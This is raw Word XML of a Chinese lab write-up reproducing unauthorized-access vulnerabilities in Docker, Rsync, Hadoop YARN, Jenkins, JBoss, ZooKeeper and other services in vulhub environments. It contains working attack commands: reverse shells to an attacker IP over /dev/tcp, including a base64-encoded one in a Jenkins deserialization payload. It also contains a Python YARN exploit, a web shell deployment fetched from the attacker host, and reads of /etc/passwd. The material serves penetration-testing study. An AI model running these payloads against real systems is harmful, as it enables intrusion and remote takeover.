          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3219450" cy="501650"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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50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t>root@kali:~# nc -vv 192.168.96.128 11211</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3390900" cy="412750"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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412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9" w:name="_Toc27438"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Jboss未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/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0" w:name="_Toc21758"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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使用vulhub搭建漏洞环境（vulhub/jboss/CVE-2017-7504）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3086100"/>
            <wp:effectExtent l="0" t="0" r="1905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"http://192.168.96.128:8080/"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http://192.168.96.128:8080/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5272405" cy="3813175"/>
            <wp:effectExtent l="0" t="0" r="10795" b="952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1" w:name="_Toc4328"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11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"http://192.168.96.128:8080/jmx-console/"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JMX Console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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5041900" cy="4210050"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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3543935"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1206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43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"http://192.168.96.128:8080/jmx-console/HtmlAdaptor?action=inspectMBean&amp;name=jboss.deployment:type=DeploymentScanner,flavor=URL"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http://192.168.96.128:8080/jmx-console/HtmlAdaptor?action=inspectMBean&amp;name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2910840"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1016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0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然后部署应用：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应用地址为：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"http://192.168.96.132/shell.war"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5"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://192.168.96.132/shell.war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（在Kali主机上启用root@kali:~/server# python -m SimpleHTTPServer 80）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500120"/>
            <wp:effectExtent l="0" t="0" r="9525" b="508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00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成功部署：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="2453640"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1016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53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访问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"http://192.168.96.128:8080/shell/"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http://192.168.96.128:8080/shell/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可以看到我们的shell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="1630045"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255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30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使用冰蝎连接木马：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="5027295"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905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27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5420" cy="3491230"/>
            <wp:effectExtent l="0" t="0" r="5080" b="127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91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执行命令：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4368800" cy="4743450"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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474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bookmarkStart w:id="12" w:name="_Toc18825"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/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"https://www.cnblogs.com/-an-/p/13566483.html"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https://www.cnblogs.com/-an-/p/13566483.html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13" w:name="_Toc4413"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>VNC未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc333"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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安装vnc可参考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"https://blog.csdn.net/nahancy/article/details/86316971"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https://blog.csdn.net/nahancy/article/details/86316971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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="4231005"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1079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31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5" w:name="_Toc18373"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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这里遇到一个问题：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部署的vnc环境，必须得设置密码，VNC服务才能启动。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但有密码，就无法复现该漏洞（攻击者无法获取到密码）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这里可参考其他人发的，使用VNC Viewer 进行漏洞利用：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1412"/>
        </w:tabs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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4184650" cy="4819650"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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481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455670"/>
            <wp:effectExtent l="0" t="0" r="635" b="11430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5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6" w:name="_Toc11220"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Docker未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc9968"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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 /vulhub-master/docker/unauthorized-rce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docker-compose build&amp;&amp;docker-compose up -d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8" w:name="_Toc5809"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p>
      <w:pPr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访问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"http://192.168.131.128:2375/version"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http://192.168.131.128:2375/version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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="808355"/>
            <wp:effectExtent l="0" t="0" r="4445" b="4445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08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以下操作，应在攻击机上操作，本处攻击机Kali磁盘不足，无法安装docker，故以下命令在靶机执行。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>docker -H tcp://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.131.128:2375  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4737100" cy="2184400"/>
            <wp:effectExtent l="0" t="0" r="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218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启动容器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-H tcp://192.168.131.128:2375 run -id -v /etc/crontabs:/tmp alpine:latest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-H tcp://192.168.131.128:2375 ps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580390"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3810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8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进入容器：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~]# docker -H tcp://192.168.131.128:2375 exec -it 5f9f32a6fdc2 sh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124450" cy="2520950"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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520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Kali上成功获取到shell：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="1112520"/>
            <wp:effectExtent l="0" t="0" r="1270" b="508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12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19" w:name="_Toc24417"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ZooKeeper 未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc19437"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/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参考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"https://blog.csdn.net/baidu_32872293/article/details/92656998"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https://blog.csdn.net/baidu_32872293/article/details/92656998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搭建zooKeeper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3221990"/>
            <wp:effectExtent l="0" t="0" r="12065" b="381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1" w:name="_Toc18208"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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执行root@kali:~# echo envi|nc 192.168.131.128 2181 获取服务器环境信息：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099310"/>
            <wp:effectExtent l="0" t="0" r="9525" b="889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9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root@kali:~# echo stat |nc 192.168.131.128 2181</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="1416685"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5715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16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参考</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4965700" cy="5429250"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350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542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22" w:name="_Toc5362"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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"https://www.cnblogs.com/xiaozi/p/8277968.html"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https://www.cnblogs.com/xiaozi/p/8277968.html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"https://www.icode9.com/content-4-599308.html"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https://www.icode9.com/content-4-599308.html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23" w:name="_Toc10097"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Rsync未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc3457"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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使用vulhub进行环境部署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root@kali:~# nmap -p 873 192.168.131.128，端口扫描结果：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4502150" cy="1473200"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="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1473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25" w:name="_Toc3669"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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root@kali:~# rsync rsync://192.168.131.128:873/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3479800" cy="330200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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33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root@kali:~# rsync rsync://192.168.131.128:873/src/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692650" cy="3028950"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="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root@kali:~# rsync -av rsync://192.168.131.128/src/etc/passwd /root/passwd.txt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785110"/>
            <wp:effectExtent l="0" t="0" r="9525" b="8890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85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下载crontab文件：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rsync -av rsync://192.168.131.128/src/etc/crontab /root/crontab.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="2504440"/>
            <wp:effectExtent l="0" t="0" r="1905" b="10160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4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编写shell文件：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root@kali:~# cat shell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#!/bin/bash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/bin/bash -i &gt;&amp; /dev/tcp/192.168.131.129/4444 0&gt;&amp;1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赋予执行权限：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chmod +x shell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将shell文件上传到cron.hourly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rsync -av shell rsync://192.168.131.128/src/etc/cron.hourly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第17分钟时，获取到shell：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="3260725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3175"/>
            <wp:docPr id="4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6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26" w:name="_Toc4034"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Hadoop未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc26866"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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使用vulhub搭建漏洞环境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vulhub-master]# cd hadoop/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hadoop]# ls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unauthorized-yarn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hadoop]# cd unauthorized-yarn/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unauthorized-yarn]# docker-compose build&amp;&amp;docker-compose up -d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"http://192.168.131.128:8088/cluster"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http://192.168.131.128:8088/cluster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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="2302510"/>
            <wp:effectExtent l="0" t="0" r="635" b="8890"/>
            <wp:docPr id="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02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rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc18799"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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Kali上开启端口监听：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nc -lvp 9999,然后执行EXP:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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#!/usr/bin/env python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requests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target = 'http://192.168.131.128:8088/'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lhost = '192.168.131.129' # put your local host ip here, and listen at port 9999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 = target + 'ws/v1/cluster/apps/new-application'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 = requests.post(url)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app_id = resp.json()['application-id']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 = target + 'ws/v1/cluster/apps'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 = {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'application-id': app_id,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'application-name': 'get-shell',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'am-container-spec': {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'commands': {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'command': '/bin/bash -i &gt;&amp; /dev/tcp/%s/9999 0&gt;&amp;1' % lhost,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'application-type': 'YARN',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requests.post(url, json=data)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1770" cy="2638425"/>
            <wp:effectExtent l="0" t="0" r="11430" b="3175"/>
            <wp:docPr id="4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29" w:name="_Toc5760"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Jenkins未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc2976"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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vulhub-master]# cd jenkins/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jenkins]# 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bash: s: 未找到命令...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jenkins]# ls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CVE-2017-1000353  CVE-2018-1000861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[root@localhost jenkins]#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jenkins]# cd CVE-2017-1000353/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CVE-2017-1000353]# docker-compose build&amp;&amp;docker-compose up -d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"http://192.168.131.128:8080/"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http://192.168.131.128:8080/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118485"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="4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18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31" w:name="_Toc24436"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用admin/admin登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>【此处漏洞环境需登录才可访问/script，旧版本存在未登录直接访问】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="2439035"/>
            <wp:effectExtent l="0" t="0" r="8890" b="12065"/>
            <wp:docPr id="4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执行println "whoami".execute().text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="2361565"/>
            <wp:effectExtent l="0" t="0" r="1905" b="635"/>
            <wp:docPr id="4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1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println "ls".execute().text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262880" cy="2622550"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6350"/>
            <wp:docPr id="4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2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执行java-jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"  生成字节码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="1259840"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1016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59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执行python3 exploit.py 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"https://link.zhihu.com/?target=http://your-ip:8080" \t "https://zhuanlan.zhihu.com/p/_blank"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http://your-ip:8080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 jenkins_poc.ser将字节码发送到靶机：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="121212"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="3380740"/>
            <wp:effectExtent l="0" t="0" r="0" b="10160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80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进入靶机可以看到，成功创建success文件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="1351915"/>
            <wp:effectExtent l="0" t="0" r="9525" b="6985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51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反弹shell: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生成字节码：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-jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc3.ser "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTMxLjEyOS85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}"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4679950"/>
            <wp:effectExtent l="0" t="0" r="635" b="6350"/>
            <wp:docPr id="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79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发送字节码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root@kali:~/CVE-2017-1000353# python3 exploit.py http://192.168.131.128:8080/ jenkins_poc3.ser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成功获取到shell：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54550" cy="3702050"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350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370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32" w:name="_Toc12750"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar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"https://github.com/vulhub/CVE-2017-1000353"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https://github.com/vulhub/CVE-2017-1000353</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc23277"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/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"https://zhuanlan.zhihu.com/p/116067599"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https://zhuanlan.zhihu.com/p/116067599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pStyle w:val="11"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc8701"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Elasticsearch未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc23737"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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使用vulhub搭建环境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vulhub-master]# cd elasticsearch/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elasticsearch]# ls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CVE-2014-3120  CVE-2015-1427  CVE-2015-3337  CVE-2015-5531  WooYun-2015-110216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elasticsearch]# cd CVE-2014-3120/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CVE-2014-3120]# LS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bash: LS: 未找到命令...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相似命令是： 'ls'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CVE-2014-3120]# ls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1.png  docker-compose.yml  README.md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CVE-2014-3120]# docker-compose build&amp;&amp;docker-compose up -d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36" w:name="_Toc14129"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p>
      <w:pPr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"http://192.168.131.128:9200/"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http://192.168.131.128:9200/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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4635500" cy="2241550"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="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224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"http://192.168.131.128:9200/_cat"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http://192.168.131.128:9200/_cat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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4832350" cy="4241800"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0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32350" cy="4241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"http://192.168.131.128:9200/_nodes"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http://192.168.131.128:9200/_nodes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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="1605915"/>
            <wp:effectExtent l="0" t="0" r="5080" b="6985"/>
            <wp:docPr id="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0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37" w:name="_Toc6259"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CouchDB未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc12445"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333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18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w: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18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://couchdb.apache.org/" </w:instrText>
      </w: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18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://couchdb.apache.org/</w:t>
      </w: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18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w: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18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 下载安装即可。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc19070"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/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"http://127.0.0.1:5984/"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http://127.0.0.1:5984/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</w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
